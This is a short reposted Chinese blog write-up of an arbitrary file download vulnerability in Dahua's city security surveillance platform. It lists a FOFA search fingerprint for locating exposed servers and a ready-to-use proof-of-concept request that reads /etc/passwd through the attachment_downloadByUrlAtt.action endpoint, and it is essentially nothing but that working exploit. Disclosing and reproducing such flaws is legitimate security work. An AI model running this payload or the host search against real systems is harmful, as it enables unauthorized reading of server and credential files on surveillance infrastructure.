0
0

大华城市安防监控系统平台管理存在任意文件下载漏洞

大华城市安防监控系统平台管理存在任意文件下载漏洞

1.大华城市安防监控系统平台管理存在任意文件下载漏洞

1.1.漏洞描述

  大华城市安防监控系统平台管理存在任意文件下载漏洞,攻击者通过漏洞可以下载服务器上的任意文件。

1.2.漏洞影响

  大华城市安防监控系统平台管理

1.3.FOFA

  “attachment_downloadByUrlAtt.action”

2.漏洞复现

2.1.登录页面

在这里插入图片描述

2.2.抓包

  刷新登录页面进行抓包,然后在数据包中添加POC。

POC:/portal/attachment_downloadByUrlAtt.action?filePath=file:///etc/passwd

在这里插入图片描述

标签: 安全 web安全 网络
本文转载自: https://blog.csdn.net/weixin_44268918/article/details/129027139
版权归原作者 剁椒鱼头没剁椒 所有, 如有侵权,请联系我们删除。
登录后发布评论

“大华城市安防监控系统平台管理存在任意文件下载漏洞”的评论:

还没有评论
关于作者
...
overfit同步小助手
文章同步
相关阅读

探索安全的Rust封装:ESP IDF SDK 的高效工具箱 —— esp-idf-svc

探秘GO Simple Tunnel:一款强大的Go语言安全隧道工具

Linux shell编程学习笔记78:cpio命令——文件和目录归档工具(上)

【DevOps】Maven 项目中常见的目录结构:集成测试代码的目录结构与单元测试的目录结构

Postman:Postman API测试:Postman中高级认证机制解析

Selenium驱动下载,浏览器最新版驱动下载

Mastercam V9.1软件安装教程、安装包下载

文章导航